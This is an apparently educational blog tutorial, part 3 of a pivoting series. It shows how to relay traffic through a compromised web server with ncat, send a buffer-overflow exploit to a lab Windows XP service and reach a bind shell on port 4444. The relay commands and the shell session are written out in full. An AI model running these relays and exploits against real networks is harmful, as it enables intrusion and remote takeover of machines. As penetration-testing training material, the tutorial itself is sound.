Introduction to pivoting, Part 3: Ncat

Written on October 16, 2012

In the past two articles, we pivoted our exploit to our target with the help of SSH. If SSH is not available, we can try to use client-to-client and listener-to-listener relays with netcat, as described by Ed Skoudis in Secrets of America’s Top Pen Testers. We will modify Skoudis’ technique by using ncat instead of netcat. Ncat is meant to be a replacement for netcat, and is included in the Nmap 5.x and higher package. I prefer ncat over netcat for this as it allows us to use the same syntax to set up the relays regardless of whether the pivot is running Linux, Windows, or Mac OS X.

The scenario

There are two networks, and Our attacking machine, and a web server that has access to the network are located in the network. Our target, a Windows XP SP2 machine, is located in the Our attacking machine does not have direct access to it, but the web server does.

We’ve already compromised the web server and obtained SSH access to it as the user webmaster. Our goal is to use the web server as our pivot and obtain a remote shell on the Windows XP machine.

The exploit

The Windows XP machine runs a vulnerable service called Server-Strcpy on port 10000. Server-Strcpy is part of the SecurityTube Exploit Research Megaprimer series, and can be downloaded at I’ve written a quick exploit for Server-Strcpy.exe that binds a shell on port 4444, and can be downloaded here.

The attack

We need to run ncat on our attacking machine, and on the web server. This means that we need to transfer ncat over to the web server. If your pivot is a Linux machine, you can build a static ncat binary using the following:

# LDFLAGS="-static" ./configure && make ncat_build

If the pivot is a Windows machine, you can download a static build of ncat.exe from Once ncat has been copied over to the pivot, we can begin.

On our attacking machine, we setup a listener-to-listener relay using the following command:

# ncat -lv --broker -m2 10000
Ncat: Version 6.01 ( )
Ncat: Listening on :::10000
Ncat: Listening on

At this point, we’ll have port 10000 listening on our machine. On the web server we execute the following command:

$ ncat -v 10000 -c "ncat -v 10000"
Ncat: Version 5.51 ( )
Ncat: Connected to
Ncat: Version 5.51 ( )
Ncat: Connected to

This tells ncat to connect to our ncat instance listening on port 10000, and then to connect to port 10000 on the target. This completes the setup, and data from our machine will flow through the web server and to the target.

Note that the syntax for executing the client-to-client relay on the pivot is the same, regardless of whether it’s a Linux, Windows, or OS X machine. There’s nothing else that needs to be done, such as creating a pipe. Compare it to the technique that uses traditional netcat to see the difference.

We can now execute our exploit. Keep in mind that we need to send it to port 10000 on our machine:

# ./ 10000
[+] sending payload of length 1479
[+] done

With the exploit sent, we can now terminate the ncat relays. Assuming the exploit worked, a bind shell should be listening on 4444 on the target. In order to access it, we once again setup ncat relays, only this time we’ll specify port 4444. On our machine we run the following command:

# ncat -lv --broker -m2 4444
Ncat: Version 6.01 ( )
Ncat: Listening on :::4444
Ncat: Listening on

On the web server, we setup the client-to-client relay:

$ ncat -v 4444 -c "ncat -v 4444"
Ncat: Version 5.51 ( )
Ncat: Connected to
Ncat: Version 5.51 ( )
Ncat: Connected to

Using netcat (or ncat), we can connect to port 4444 on our machine to get a remote shell on the target:

# nc -v 4444
localhost [] 4444 (?) open
C:\Documents and Settings\Administrator\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . :
        Subnet Mask . . . . . . . . . . . :
        Default Gateway . . . . . . . . . :
C:\Documents and Settings\Administrator\Desktop>

We’ve obtained remote shell access to the Windows XP target once more.

Ncat is a great tool and builds enhancements into the old netcat. It’s small, available for major operating systems, and easy to use. In part 4 of this serieis, we’ll look at Metasploit’s pivoting feature. If Metasploit is your exploitation framework of choice, you’ll want to learn to use it to pivot your attacks.